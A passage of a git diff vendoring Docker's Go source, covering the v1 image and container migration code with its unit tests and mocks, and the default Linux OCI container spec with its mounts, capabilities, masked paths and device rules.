getParent(filepath.Join(root, graphDirName, id)) + if err != nil { + return err + } + + var parentID image.ID + if parent != "" { + var exists bool + if parentID, exists = mappings[parent]; !exists { + if err := migrateImage(parent, root, ls, is, ms, mappings); err != nil { + // todo: fail or allow broken chains? + return err + } + parentID = mappings[parent] + } + } + + rootFS := image.NewRootFS() + var history []image.History + + if parentID != "" { + parentImg, err := is.Get(parentID) + if err != nil { + return err + } + + rootFS = parentImg.RootFS + history = parentImg.History + } + + diffIDData, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, migrationDiffIDFileName)) + if err != nil { + return err + } + diffID, err := digest.ParseDigest(string(diffIDData)) + if err != nil { + return err + } + + sizeStr, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, migrationSizeFileName)) + if err != nil { + return err + } + size, err := strconv.ParseInt(string(sizeStr), 10, 64) + if err != nil { + return err + } + + layer, err := ls.RegisterByGraphID(id, rootFS.ChainID(), layer.DiffID(diffID), filepath.Join(root, graphDirName, id, migrationTarDataFileName), size) + if err != nil { + return err + } + logrus.Infof("migrated layer %s to %s", id, layer.DiffID()) + + jsonFile := filepath.Join(root, graphDirName, id, "json") + imageJSON, err := ioutil.ReadFile(jsonFile) + if err != nil { + return err + } + + h, err := imagev1.HistoryFromConfig(imageJSON, false) + if err != nil { + return err + } + history = append(history, h) + + rootFS.Append(layer.DiffID()) + + config, err := imagev1.MakeConfigFromV1Config(imageJSON, rootFS, history) + if err != nil { + return err + } + strongID, err := is.Create(config) + if err != nil { + return err + } + logrus.Infof("migrated image %s to %s", id, strongID) + + if parentID != "" { + if err := is.SetParent(strongID, parentID); err != nil { + return err + } + } + + checksum, err := ioutil.ReadFile(filepath.Join(root, 
graphDirName, id, "checksum")) + if err == nil { // best effort + dgst, err := digest.ParseDigest(string(checksum)) + if err == nil { + V2MetadataService := metadata.NewV2MetadataService(ms) + V2MetadataService.Add(layer.DiffID(), metadata.V2Metadata{Digest: dgst}) + } + } + _, err = ls.Release(layer) + if err != nil { + return err + } + + mappings[id] = strongID + return +} + +func rawJSON(value interface{}) *json.RawMessage { + jsonval, err := json.Marshal(value) + if err != nil { + return nil + } + return (*json.RawMessage)(&jsonval) +} diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go new file mode 100644 index 0000000000..be82fdc75e --- /dev/null +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go @@ -0,0 +1,438 @@ +package v1 + +import ( + "crypto/rand" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "runtime" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +func TestMigrateRefs(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "migrate-tags") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + ioutil.WriteFile(filepath.Join(tmpdir, "repositories-generic"), []byte(`{"Repositories":{"busybox":{"latest":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108","sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108"},"registry":{"2":"5d165b8e4b203685301c815e95663231691d383fd5e3d3185d1ce3f8dddead3d","latest":"8d5547a9f329b1d3f93198cd661fb5117e5a96b721c5cf9a2c389e7dd4877128"}}}`), 0600) + + ta := &mockTagAdder{} + err = migrateRefs(tmpdir, "generic", ta, map[string]image.ID{ + 
"5d165b8e4b203685301c815e95663231691d383fd5e3d3185d1ce3f8dddead3d": image.ID("sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"), + "b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9"), + "abcdef3434c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:56434342345ae68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"), + }) + if err != nil { + t.Fatal(err) + } + + expected := map[string]string{ + "busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae", + } + + if !reflect.DeepEqual(expected, ta.refs) { + t.Fatalf("Invalid migrated tags: expected %q, got %q", expected, ta.refs) + } + + // second migration is no-op + ioutil.WriteFile(filepath.Join(tmpdir, "repositories-generic"), []byte(`{"Repositories":{"busybox":{"latest":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108"`), 0600) + err = migrateRefs(tmpdir, "generic", ta, map[string]image.ID{ + "b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9"), + }) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(expected, ta.refs) { + t.Fatalf("Invalid migrated tags: expected %q, got %q", expected, ta.refs) + } +} + +func TestMigrateContainers(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + if runtime.GOARCH != "amd64" { + t.Skip("Test tailored to amd64 architecture") + } + tmpdir, err := ioutil.TempDir("", "migrate-containers") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) 
+ + err = addContainer(tmpdir, `{"State":{"Running":false,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":0,"ExitCode":0,"Error":"","StartedAt":"2015-11-10T21:42:40.604267436Z","FinishedAt":"2015-11-10T21:42:41.869265487Z"},"ID":"f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c","Created":"2015-11-10T21:42:40.433831551Z","Path":"sh","Args":[],"Config":{"Hostname":"f780ee3f80e6","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":["sh"],"Image":"busybox","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{}},"Image":"2c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093","NetworkSettings":{"Bridge":"","EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"HairpinMode":false,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"MacAddress":"","NetworkID":"","PortMapping":null,"Ports":null,"SandboxKey":"","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null},"ResolvConfPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/resolv.conf","HostnamePath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hostname","HostsPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hosts","LogPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c-json.log","Name":"/determined_euclid","Driver":"overlay","ExecDriver":"native-0.2","MountLabel":"","ProcessLabel":"","RestartCount":0,"UpdateDns":false,"HasBeenStartedBefore":false,"MountPoints":{},"Volumes":{},"VolumesRW":{},"AppArmorProfile":""}`) + if err != nil { + t.Fatal(err) + } + + // container with invalid image + err = addContainer(tmpdir, 
`{"State":{"Running":false,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":0,"ExitCode":0,"Error":"","StartedAt":"2015-11-10T21:42:40.604267436Z","FinishedAt":"2015-11-10T21:42:41.869265487Z"},"ID":"e780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c","Created":"2015-11-10T21:42:40.433831551Z","Path":"sh","Args":[],"Config":{"Hostname":"f780ee3f80e6","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":["sh"],"Image":"busybox","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{}},"Image":"4c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093","NetworkSettings":{"Bridge":"","EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"HairpinMode":false,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"MacAddress":"","NetworkID":"","PortMapping":null,"Ports":null,"SandboxKey":"","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null},"ResolvConfPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/resolv.conf","HostnamePath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hostname","HostsPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hosts","LogPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c-json.log","Name":"/determined_euclid","Driver":"overlay","ExecDriver":"native-0.2","MountLabel":"","ProcessLabel":"","RestartCount":0,"UpdateDns":false,"HasBeenStartedBefore":false,"MountPoints":{},"Volumes":{},"VolumesRW":{},"AppArmorProfile":""}`) + if err != nil { + t.Fatal(err) + } + + ls := &mockMounter{} + + ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) + if err != 
nil { + t.Fatal(err) + } + + is, err := image.NewImageStore(ifs, ls) + if err != nil { + t.Fatal(err) + } + + imgID, err := is.Create([]byte(`{"architecture":"amd64","config":{"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Cmd":["sh"],"Entrypoint":null,"Env":null,"Hostname":"23304fc829f9","Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Labels":null,"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":false,"Volumes":null,"WorkingDir":"","Domainname":"","User":""},"container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Entrypoint":null,"Env":null,"Hostname":"23304fc829f9","Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Labels":null,"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":false,"Volumes":null,"WorkingDir":"","Domainname":"","User":""},"created":"2015-10-31T22:22:55.613815829Z","docker_version":"1.8.2","history":[{"created":"2015-10-31T22:22:54.690851953Z","created_by":"/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"},{"created":"2015-10-31T22:22:55.613815829Z","created_by":"/bin/sh -c #(nop) CMD [\"sh\"]"}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1","sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"]}}`)) + if err != nil { + t.Fatal(err) + } + + err = migrateContainers(tmpdir, ls, is, map[string]image.ID{ + "2c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093": imgID, + }) + if err != nil { + t.Fatal(err) + } + + expected := []mountInfo{{ + "f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c", + "f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c", + "sha256:c3191d32a37d7159b2e30830937d2e30268ad6c375a773a8994911a3aba9b93f", + }} + if 
!reflect.DeepEqual(expected, ls.mounts) { + t.Fatalf("invalid mounts: expected %q, got %q", expected, ls.mounts) + } + + if actual, expected := ls.count, 0; actual != expected { + t.Fatalf("invalid active mounts: expected %d, got %d", expected, actual) + } + + config2, err := ioutil.ReadFile(filepath.Join(tmpdir, "containers", "f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c", "config.v2.json")) + if err != nil { + t.Fatal(err) + } + var config struct{ Image string } + err = json.Unmarshal(config2, &config) + if err != nil { + t.Fatal(err) + } + + if actual, expected := config.Image, string(imgID); actual != expected { + t.Fatalf("invalid image pointer in migrated config: expected %q, got %q", expected, actual) + } + +} + +func TestMigrateImages(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + if runtime.GOARCH != "amd64" { + t.Skip("Test tailored to amd64 architecture") + } + tmpdir, err := ioutil.TempDir("", "migrate-images") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + // busybox from 1.9 + id1, err := addImage(tmpdir, `{"architecture":"amd64","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"container":"23304fc829f9b9349416f6eb1afec162907eba3a328f51d53a17f8986f865d65","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in 
/"],"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"created":"2015-10-31T22:22:54.690851953Z","docker_version":"1.8.2","layer_id":"sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57","os":"linux"}`, "", "") + if err != nil { + t.Fatal(err) + } + + id2, err := addImage(tmpdir, `{"architecture":"amd64","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["sh"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"created":"2015-10-31T22:22:55.613815829Z","docker_version":"1.8.2","layer_id":"sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4","os":"linux","parent_id":"sha256:039b63dd2cbaa10d6015ea574392530571ed8d7b174090f032211285a71881d0"}`, id1, "") + if err != nil { + t.Fatal(err) + } + + ls := &mockRegistrar{} + + ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) + if err != nil { + t.Fatal(err) + } + + is, err := image.NewImageStore(ifs, ls) + if err != nil { + t.Fatal(err) + } + + ms, err := metadata.NewFSMetadataStore(filepath.Join(tmpdir, "distribution")) + if err != nil { + t.Fatal(err) + } + mappings := make(map[string]image.ID) + + err = migrateImages(tmpdir, ls, is, ms, mappings) + if err != nil { + t.Fatal(err) + } + + expected := map[string]image.ID{ + 
id1: image.ID("sha256:ca406eaf9c26898414ff5b7b3a023c33310759d6203be0663dbf1b3a712f432d"), + id2: image.ID("sha256:a488bec94bb96b26a968f913d25ef7d8d204d727ca328b52b4b059c7d03260b6"), + } + + if !reflect.DeepEqual(mappings, expected) { + t.Fatalf("invalid image mappings: expected %q, got %q", expected, mappings) + } + + if actual, expected := ls.count, 2; actual != expected { + t.Fatalf("invalid register count: expected %q, got %q", expected, actual) + } + ls.count = 0 + + // next images are busybox from 1.8.2 + _, err = addImage(tmpdir, `{"id":"17583c7dd0dae6244203b8029733bdb7d17fccbb2b5d93e2b24cf48b8bfd06e2","parent":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","created":"2015-10-31T22:22:55.613815829Z","container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"docker_version":"1.8.2","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["sh"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"architecture":"amd64","os":"linux","Size":0}`, "", "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4") + if err != nil { + t.Fatal(err) + } + + _, err = addImage(tmpdir, 
`{"id":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","created":"2015-10-31T22:22:54.690851953Z","container":"23304fc829f9b9349416f6eb1afec162907eba3a328f51d53a17f8986f865d65","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"],"Image":"","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"docker_version":"1.8.2","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"architecture":"amd64","os":"linux","Size":1108935}`, "", "sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57") + if err != nil { + t.Fatal(err) + } + + err = migrateImages(tmpdir, ls, is, ms, mappings) + if err != nil { + t.Fatal(err) + } + + expected["d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498"] = image.ID("sha256:c091bb33854e57e6902b74c08719856d30b5593c7db6143b2b48376b8a588395") + expected["17583c7dd0dae6244203b8029733bdb7d17fccbb2b5d93e2b24cf48b8bfd06e2"] = image.ID("sha256:d963020e755ff2715b936065949472c1f8a6300144b922992a1a421999e71f07") + + if actual, expected := ls.count, 2; actual != expected { + t.Fatalf("invalid register count: expected %q, got %q", expected, actual) + } + + v2MetadataService := metadata.NewV2MetadataService(ms) + receivedMetadata, err := v2MetadataService.GetMetadata(layer.EmptyLayer.DiffID()) + if err != nil { + 
t.Fatal(err) + } + + expectedMetadata := []metadata.V2Metadata{ + {Digest: digest.Digest("sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57")}, + {Digest: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + } + + if !reflect.DeepEqual(expectedMetadata, receivedMetadata) { + t.Fatalf("invalid metadata: expected %q, got %q", expectedMetadata, receivedMetadata) + } + +} + +func TestMigrateUnsupported(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "migrate-empty") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + err = os.MkdirAll(filepath.Join(tmpdir, "graph"), 0700) + if err != nil { + t.Fatal(err) + } + + err = Migrate(tmpdir, "generic", nil, nil, nil, nil) + if err != errUnsupported { + t.Fatalf("expected unsupported error, got %q", err) + } +} + +func TestMigrateEmptyDir(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "migrate-empty") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + err = Migrate(tmpdir, "generic", nil, nil, nil, nil) + if err != nil { + t.Fatal(err) + } +} + +func addImage(dest, jsonConfig, parent, checksum string) (string, error) { + var config struct{ ID string } + if err := json.Unmarshal([]byte(jsonConfig), &config); err != nil { + return "", err + } + if config.ID == "" { + b := make([]byte, 32) + rand.Read(b) + config.ID = hex.EncodeToString(b) + } + contDir := filepath.Join(dest, "graph", config.ID) + if err := os.MkdirAll(contDir, 0700); err != nil { + return "", err + } + if err := ioutil.WriteFile(filepath.Join(contDir, "json"), []byte(jsonConfig), 0600); err != nil { + return "", err + } + if checksum != "" { + if err := ioutil.WriteFile(filepath.Join(contDir, "checksum"), []byte(checksum), 0600); err != nil { + return "", err + } + } + if err := ioutil.WriteFile(filepath.Join(contDir, ".migration-diffid"), []byte(layer.EmptyLayer.DiffID()), 0600); err != nil { + return "", err + } + if err := 
ioutil.WriteFile(filepath.Join(contDir, ".migration-size"), []byte("0"), 0600); err != nil { + return "", err + } + if parent != "" { + if err := ioutil.WriteFile(filepath.Join(contDir, "parent"), []byte(parent), 0600); err != nil { + return "", err + } + } + if checksum != "" { + if err := ioutil.WriteFile(filepath.Join(contDir, "checksum"), []byte(checksum), 0600); err != nil { + return "", err + } + } + return config.ID, nil +} + +func addContainer(dest, jsonConfig string) error { + var config struct{ ID string } + if err := json.Unmarshal([]byte(jsonConfig), &config); err != nil { + return err + } + contDir := filepath.Join(dest, "containers", config.ID) + if err := os.MkdirAll(contDir, 0700); err != nil { + return err + } + if err := ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600); err != nil { + return err + } + return nil +} + +type mockTagAdder struct { + refs map[string]string +} + +func (t *mockTagAdder) AddTag(ref reference.Named, id digest.Digest, force bool) error { + if t.refs == nil { + t.refs = make(map[string]string) + } + t.refs[ref.String()] = id.String() + return nil +} +func (t *mockTagAdder) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { + return t.AddTag(ref, id, force) +} + +type mockRegistrar struct { + layers map[layer.ChainID]*mockLayer + count int +} + +func (r *mockRegistrar) RegisterByGraphID(graphID string, parent layer.ChainID, diffID layer.DiffID, tarDataFile string, size int64) (layer.Layer, error) { + r.count++ + l := &mockLayer{} + if parent != "" { + p, exists := r.layers[parent] + if !exists { + return nil, fmt.Errorf("invalid parent %q", parent) + } + l.parent = p + l.diffIDs = append(l.diffIDs, p.diffIDs...) 
+ } + l.diffIDs = append(l.diffIDs, diffID) + if r.layers == nil { + r.layers = make(map[layer.ChainID]*mockLayer) + } + r.layers[l.ChainID()] = l + return l, nil +} +func (r *mockRegistrar) Release(l layer.Layer) ([]layer.Metadata, error) { + return nil, nil +} +func (r *mockRegistrar) Get(layer.ChainID) (layer.Layer, error) { + return nil, nil +} + +type mountInfo struct { + name, graphID, parent string +} +type mockMounter struct { + mounts []mountInfo + count int +} + +func (r *mockMounter) CreateRWLayerByGraphID(name string, graphID string, parent layer.ChainID) error { + r.mounts = append(r.mounts, mountInfo{name, graphID, string(parent)}) + return nil +} +func (r *mockMounter) Unmount(string) error { + r.count-- + return nil +} +func (r *mockMounter) Get(layer.ChainID) (layer.Layer, error) { + return nil, nil +} + +func (r *mockMounter) Release(layer.Layer) ([]layer.Metadata, error) { + return nil, nil +} + +type mockLayer struct { + diffIDs []layer.DiffID + parent *mockLayer +} + +func (l *mockLayer) TarStream() (io.ReadCloser, error) { + return nil, nil +} +func (l *mockLayer) TarStreamFrom(layer.ChainID) (io.ReadCloser, error) { + return nil, nil +} + +func (l *mockLayer) ChainID() layer.ChainID { + return layer.CreateChainID(l.diffIDs) +} + +func (l *mockLayer) DiffID() layer.DiffID { + return l.diffIDs[len(l.diffIDs)-1] +} + +func (l *mockLayer) Parent() layer.Layer { + if l.parent == nil { + return nil + } + return l.parent +} + +func (l *mockLayer) Size() (int64, error) { + return 0, nil +} + +func (l *mockLayer) DiffSize() (int64, error) { + return 0, nil +} + +func (l *mockLayer) Metadata() (map[string]string, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/oci/defaults_linux.go b/vendor/github.com/docker/docker/oci/defaults_linux.go new file mode 100644 index 0000000000..8b3ce7281b --- /dev/null +++ b/vendor/github.com/docker/docker/oci/defaults_linux.go @@ -0,0 +1,168 @@ +package oci + +import ( + "os" + "runtime" + + 
"github.com/opencontainers/runtime-spec/specs-go" +) + +func sPtr(s string) *string { return &s } +func iPtr(i int64) *int64 { return &i } +func u32Ptr(i int64) *uint32 { u := uint32(i); return &u } +func fmPtr(i int64) *os.FileMode { fm := os.FileMode(i); return &fm } + +// DefaultSpec returns default oci spec used by docker. +func DefaultSpec() specs.Spec { + s := specs.Spec{ + Version: specs.Version, + Platform: specs.Platform{ + OS: runtime.GOOS, + Arch: runtime.GOARCH, + }, + } + s.Mounts = []specs.Mount{ + { + Destination: "/proc", + Type: "proc", + Source: "proc", + Options: []string{"nosuid", "noexec", "nodev"}, + }, + { + Destination: "/dev", + Type: "tmpfs", + Source: "tmpfs", + Options: []string{"nosuid", "strictatime", "mode=755"}, + }, + { + Destination: "/dev/pts", + Type: "devpts", + Source: "devpts", + Options: []string{"nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5"}, + }, + { + Destination: "/sys", + Type: "sysfs", + Source: "sysfs", + Options: []string{"nosuid", "noexec", "nodev", "ro"}, + }, + { + Destination: "/sys/fs/cgroup", + Type: "cgroup", + Source: "cgroup", + Options: []string{"ro", "nosuid", "noexec", "nodev"}, + }, + { + Destination: "/dev/mqueue", + Type: "mqueue", + Source: "mqueue", + Options: []string{"nosuid", "noexec", "nodev"}, + }, + } + s.Process.Capabilities = []string{ + "CAP_CHOWN", + "CAP_DAC_OVERRIDE", + "CAP_FSETID", + "CAP_FOWNER", + "CAP_MKNOD", + "CAP_NET_RAW", + "CAP_SETGID", + "CAP_SETUID", + "CAP_SETFCAP", + "CAP_SETPCAP", + "CAP_NET_BIND_SERVICE", + "CAP_SYS_CHROOT", + "CAP_KILL", + "CAP_AUDIT_WRITE", + } + + s.Linux = &specs.Linux{ + MaskedPaths: []string{ + "/proc/kcore", + "/proc/latency_stats", + "/proc/timer_list", + "/proc/timer_stats", + "/proc/sched_debug", + "/sys/firmware", + }, + ReadonlyPaths: []string{ + "/proc/asound", + "/proc/bus", + "/proc/fs", + "/proc/irq", + "/proc/sys", + "/proc/sysrq-trigger", + }, + Namespaces: []specs.Namespace{ + {Type: "mount"}, + {Type: 
"network"}, + {Type: "uts"}, + {Type: "pid"}, + {Type: "ipc"}, + }, + // Devices implicitly contains the following devices: + // null, zero, full, random, urandom, tty, console, and ptmx. + // ptmx is a bind-mount or symlink of the container's ptmx. + // See also: https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#default-devices + Devices: []specs.Device{}, + Resources: &specs.Resources{ + Devices: []specs.DeviceCgroup{ + { + Allow: false, + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(5), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(3), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(9), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(8), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(5), + Minor: iPtr(0), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(5), + Minor: iPtr(1), + Access: sPtr("rwm"), + }, + { + Allow: false, + Type: sPtr("c"), + Major: iPtr(10), + Minor: iPtr(229), + Access: sPtr("rwm"), + }, + }, + }, + } + + return s +} diff --git a/vendor/github.com/docker/docker/oci/defaults_solaris.go b/vendor/github.com/docker/docker/oci/defaults_solaris.go new file mode 100644 index 0000000000..85c8b68e16 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/defaults_solaris.go @@ -0,0 +1,20 @@ +package oci + +import ( + "runtime" + + 